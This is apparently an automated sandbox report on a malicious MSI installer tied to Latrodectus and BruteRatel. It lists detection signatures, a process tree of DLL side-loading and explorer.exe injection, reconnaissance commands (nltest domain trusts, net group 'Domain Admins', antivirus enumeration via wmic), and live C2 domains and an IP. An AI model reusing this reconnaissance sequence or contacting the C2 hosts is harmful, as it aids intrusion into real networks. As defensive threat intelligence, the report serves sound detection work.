Edit tour

Windows Analysis Report
fes.msi

Overview

General Information

Sample name:	fes.msi
Analysis ID:	1567646
MD5:	371fe9184f46204250bcb30fe62f3a08
SHA1:	490453e5eeaaf89071a29c68548314d1e9b21592
SHA256:	658b8c47d7193c7c31a2540b2f54fcdfb9298d8346a4ad3be7e684ef946f57a5
Tags:	BruteRatelBruteRatelC4Latrodectusmsiuser-k3dg3___
Infos:

Detection

BruteRatel, Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected BruteRatel

Yara detected Latrodectus

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks if browser processes are running

Contains functionality to inject threads in other processes

Contains functionality to steal Internet Explorer form passwords

Creates a thread in another existing process (thread injection)

Drops executables to the windows directory (C:\Windows) and starts them

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sets debug register (to hijack the execution of another thread)

Sigma detected: RunDLL32 Spawning Explorer

Tries to harvest and steal browser information (history, passwords, etc)

Uses ipconfig to lookup or modify the Windows network settings

Uses net.exe to modify the status of services

Uses whoami command line tool to query computer and username

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 6092 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fes.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 2492 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 5824 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201B MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSI17D3.tmp (PID: 6344 cmdline: "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain MD5: B9545ED17695A32FACE8C3408A6A3553)

rundll32.exe (PID: 7176 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7192 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain MD5: EF3179D498793BF4234F708D3BE28633)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmd.exe (PID: 8120 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 8172 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

cmd.exe (PID: 5780 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 5824 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 5932 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 3688 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 3052 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 7320 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 1892 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 5924 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 7416 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cmd.exe (PID: 7508 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 7480 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cmd.exe (PID: 4996 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 5436 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 2596 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

WMIC.exe (PID: 2848 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2024 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 5836 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 1404 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

cmd.exe (PID: 2144 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4556 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 5324 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 7672 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

whoami.exe (PID: 5632 cmdline: whoami /groups MD5: A4A6924F3EAF97981323703D38FD99C4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name	Description	Attribution	Blogpost URLs	Link
Latrodectus, Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://any.run/malware-trends/latrodectus https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Process Memory Space: rundll32.exe PID: 7192	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
decrypted.memstr	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: RunDLL32 Spawning Explorer

Source: Process started

Author: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7192, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4996, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5436, ProcessName: net.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: whoami /groups, CommandLine: whoami /groups, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: /c whoami /groups, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: whoami /groups, ProcessId: 5632, ProcessName: whoami.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5924, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 7416, ProcessName: net.exe

Sigma detected: Share And Session Enumeration Using Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5924, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 7416, ProcessName: net.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 8120, ProcessName: cmd.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:44:54.379891+0100	2028371	3	Unknown Traffic	192.168.2.4	49851	104.21.68.89	443	TCP
2024-12-03T17:44:58.055216+0100	2028371	3	Unknown Traffic	192.168.2.4	49861	104.21.68.89	443	TCP
2024-12-03T17:45:01.629389+0100	2028371	3	Unknown Traffic	192.168.2.4	49869	104.21.68.89	443	TCP
2024-12-03T17:45:05.379758+0100	2028371	3	Unknown Traffic	192.168.2.4	49878	104.21.68.89	443	TCP
2024-12-03T17:45:08.346102+0100	2028371	3	Unknown Traffic	192.168.2.4	49886	104.21.68.89	443	TCP
2024-12-03T17:45:11.770296+0100	2028371	3	Unknown Traffic	192.168.2.4	49894	104.21.68.89	443	TCP
2024-12-03T17:45:14.774392+0100	2028371	3	Unknown Traffic	192.168.2.4	49904	104.21.68.89	443	TCP
2024-12-03T17:45:20.564003+0100	2028371	3	Unknown Traffic	192.168.2.4	49918	104.21.68.89	443	TCP
2024-12-03T17:45:23.534992+0100	2028371	3	Unknown Traffic	192.168.2.4	49926	104.21.68.89	443	TCP
2024-12-03T17:45:26.493487+0100	2028371	3	Unknown Traffic	192.168.2.4	49933	104.21.68.89	443	TCP
2024-12-03T17:45:29.462059+0100	2028371	3	Unknown Traffic	192.168.2.4	49940	104.21.68.89	443	TCP
2024-12-03T17:45:32.419083+0100	2028371	3	Unknown Traffic	192.168.2.4	49948	104.21.68.89	443	TCP
2024-12-03T17:45:35.304375+0100	2028371	3	Unknown Traffic	192.168.2.4	49956	104.21.68.89	443	TCP
2024-12-03T17:45:38.218907+0100	2028371	3	Unknown Traffic	192.168.2.4	49962	104.21.68.89	443	TCP
2024-12-03T17:45:41.613892+0100	2028371	3	Unknown Traffic	192.168.2.4	49972	104.21.68.89	443	TCP
2024-12-03T17:45:44.594985+0100	2028371	3	Unknown Traffic	192.168.2.4	49979	104.21.68.89	443	TCP
2024-12-03T17:45:47.402474+0100	2028371	3	Unknown Traffic	192.168.2.4	49986	104.21.68.89	443	TCP
2024-12-03T17:45:50.363398+0100	2028371	3	Unknown Traffic	192.168.2.4	49994	104.21.68.89	443	TCP
2024-12-03T17:45:53.382246+0100	2028371	3	Unknown Traffic	192.168.2.4	50002	104.21.68.89	443	TCP
2024-12-03T17:45:56.463152+0100	2028371	3	Unknown Traffic	192.168.2.4	50008	104.21.68.89	443	TCP
2024-12-03T17:45:59.272932+0100	2028371	3	Unknown Traffic	192.168.2.4	50016	104.21.68.89	443	TCP
2024-12-03T17:46:02.293633+0100	2028371	3	Unknown Traffic	192.168.2.4	50025	104.21.68.89	443	TCP
2024-12-03T17:46:05.673225+0100	2028371	3	Unknown Traffic	192.168.2.4	50029	104.21.68.89	443	TCP
2024-12-03T17:46:08.704029+0100	2028371	3	Unknown Traffic	192.168.2.4	50030	104.21.68.89	443	TCP
2024-12-03T17:46:11.743479+0100	2028371	3	Unknown Traffic	192.168.2.4	50031	104.21.68.89	443	TCP
2024-12-03T17:46:14.546290+0100	2028371	3	Unknown Traffic	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-03T17:46:17.305730+0100	2028371	3	Unknown Traffic	192.168.2.4	50033	104.21.68.89	443	TCP
2024-12-03T17:46:20.824721+0100	2028371	3	Unknown Traffic	192.168.2.4	50034	104.21.68.89	443	TCP
2024-12-03T17:46:23.775020+0100	2028371	3	Unknown Traffic	192.168.2.4	50035	104.21.68.89	443	TCP
2024-12-03T17:46:26.531713+0100	2028371	3	Unknown Traffic	192.168.2.4	50036	104.21.68.89	443	TCP
2024-12-03T17:46:29.573064+0100	2028371	3	Unknown Traffic	192.168.2.4	50037	104.21.68.89	443	TCP
2024-12-03T17:46:32.535273+0100	2028371	3	Unknown Traffic	192.168.2.4	50038	104.21.68.89	443	TCP
2024-12-03T17:46:35.482631+0100	2028371	3	Unknown Traffic	192.168.2.4	50039	104.21.68.89	443	TCP
2024-12-03T17:46:38.669901+0100	2028371	3	Unknown Traffic	192.168.2.4	50040	104.21.68.89	443	TCP
2024-12-03T17:46:41.921134+0100	2028371	3	Unknown Traffic	192.168.2.4	50041	104.21.68.89	443	TCP
2024-12-03T17:46:44.882994+0100	2028371	3	Unknown Traffic	192.168.2.4	50042	104.21.68.89	443	TCP
2024-12-03T17:46:47.937903+0100	2028371	3	Unknown Traffic	192.168.2.4	50043	104.21.68.89	443	TCP
2024-12-03T17:46:50.975118+0100	2028371	3	Unknown Traffic	192.168.2.4	50044	104.21.68.89	443	TCP
2024-12-03T17:46:54.009056+0100	2028371	3	Unknown Traffic	192.168.2.4	50045	104.21.68.89	443	TCP
2024-12-03T17:46:56.971792+0100	2028371	3	Unknown Traffic	192.168.2.4	50046	104.21.68.89	443	TCP
2024-12-03T17:47:00.013389+0100	2028371	3	Unknown Traffic	192.168.2.4	50047	104.21.68.89	443	TCP
2024-12-03T17:47:03.056418+0100	2028371	3	Unknown Traffic	192.168.2.4	50048	104.21.68.89	443	TCP
2024-12-03T17:47:05.980918+0100	2028371	3	Unknown Traffic	192.168.2.4	50049	104.21.68.89	443	TCP

ET MALWARE Latrodectus Loader Related Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:44:54.415374+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49851	104.21.68.89	443	TCP
2024-12-03T17:44:59.611086+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49861	104.21.68.89	443	TCP
2024-12-03T17:45:03.275392+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49869	104.21.68.89	443	TCP
2024-12-03T17:45:07.016597+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49878	104.21.68.89	443	TCP
2024-12-03T17:45:22.185697+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49918	104.21.68.89	443	TCP
2024-12-03T17:45:23.620132+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49926	104.21.68.89	443	TCP
2024-12-03T17:45:28.142357+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49933	104.21.68.89	443	TCP
2024-12-03T17:45:31.050996+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49940	104.21.68.89	443	TCP
2024-12-03T17:45:34.078027+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49948	104.21.68.89	443	TCP
2024-12-03T17:45:35.305293+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49956	104.21.68.89	443	TCP
2024-12-03T17:45:39.863630+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49962	104.21.68.89	443	TCP
2024-12-03T17:45:43.254844+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49972	104.21.68.89	443	TCP
2024-12-03T17:45:45.985478+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49979	104.21.68.89	443	TCP
2024-12-03T17:45:48.998507+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49986	104.21.68.89	443	TCP
2024-12-03T17:45:51.982734+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49994	104.21.68.89	443	TCP
2024-12-03T17:45:55.005110+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50002	104.21.68.89	443	TCP
2024-12-03T17:45:57.857798+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50008	104.21.68.89	443	TCP
2024-12-03T17:46:00.923656+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50016	104.21.68.89	443	TCP
2024-12-03T17:46:03.910895+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50025	104.21.68.89	443	TCP
2024-12-03T17:46:07.271717+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50029	104.21.68.89	443	TCP
2024-12-03T17:46:10.384291+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50030	104.21.68.89	443	TCP
2024-12-03T17:46:13.177160+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50031	104.21.68.89	443	TCP
2024-12-03T17:46:15.951144+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-03T17:46:18.925226+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50033	104.21.68.89	443	TCP
2024-12-03T17:46:22.430239+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50034	104.21.68.89	443	TCP
2024-12-03T17:46:25.189996+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50035	104.21.68.89	443	TCP
2024-12-03T17:46:28.179025+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50036	104.21.68.89	443	TCP
2024-12-03T17:46:31.178283+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50037	104.21.68.89	443	TCP
2024-12-03T17:46:34.164009+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50038	104.21.68.89	443	TCP
2024-12-03T17:46:37.154947+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50039	104.21.68.89	443	TCP
2024-12-03T17:46:40.295686+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50040	104.21.68.89	443	TCP
2024-12-03T17:46:43.513199+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50041	104.21.68.89	443	TCP
2024-12-03T17:46:46.549587+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50042	104.21.68.89	443	TCP
2024-12-03T17:46:49.573431+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50043	104.21.68.89	443	TCP
2024-12-03T17:46:52.624897+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50044	104.21.68.89	443	TCP
2024-12-03T17:46:55.621124+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50045	104.21.68.89	443	TCP
2024-12-03T17:46:58.640678+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50046	104.21.68.89	443	TCP
2024-12-03T17:47:01.667227+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50047	104.21.68.89	443	TCP
2024-12-03T17:47:04.446766+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50048	104.21.68.89	443	TCP
2024-12-03T17:47:07.616711+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50049	104.21.68.89	443	TCP

ET MALWARE Zbot Generic URI/Header Struct .bin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:45:10.537073+0100	2018052	1	A Network Trojan was detected	192.168.2.4	49886	104.21.68.89	443	TCP
2024-12-03T17:45:13.494370+0100	2018052	1	A Network Trojan was detected	192.168.2.4	49894	104.21.68.89	443	TCP
2024-12-03T17:45:16.562417+0100	2018052	1	A Network Trojan was detected	192.168.2.4	49904	104.21.68.89	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:45:10.537073+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49886	104.21.68.89	443	TCP
2024-12-03T17:45:16.562417+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49904	104.21.68.89	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/W	Avira URL Cloud: Label: malware
Source: https://reateberam.com/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/G	Avira URL Cloud: Label: malware

Found malware configuration

Source: 9.2.explorer.exe.3110000.0.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c ipconfig /all
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c systeminfo
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c net view /all
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 9.2.explorer.exe.3110000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
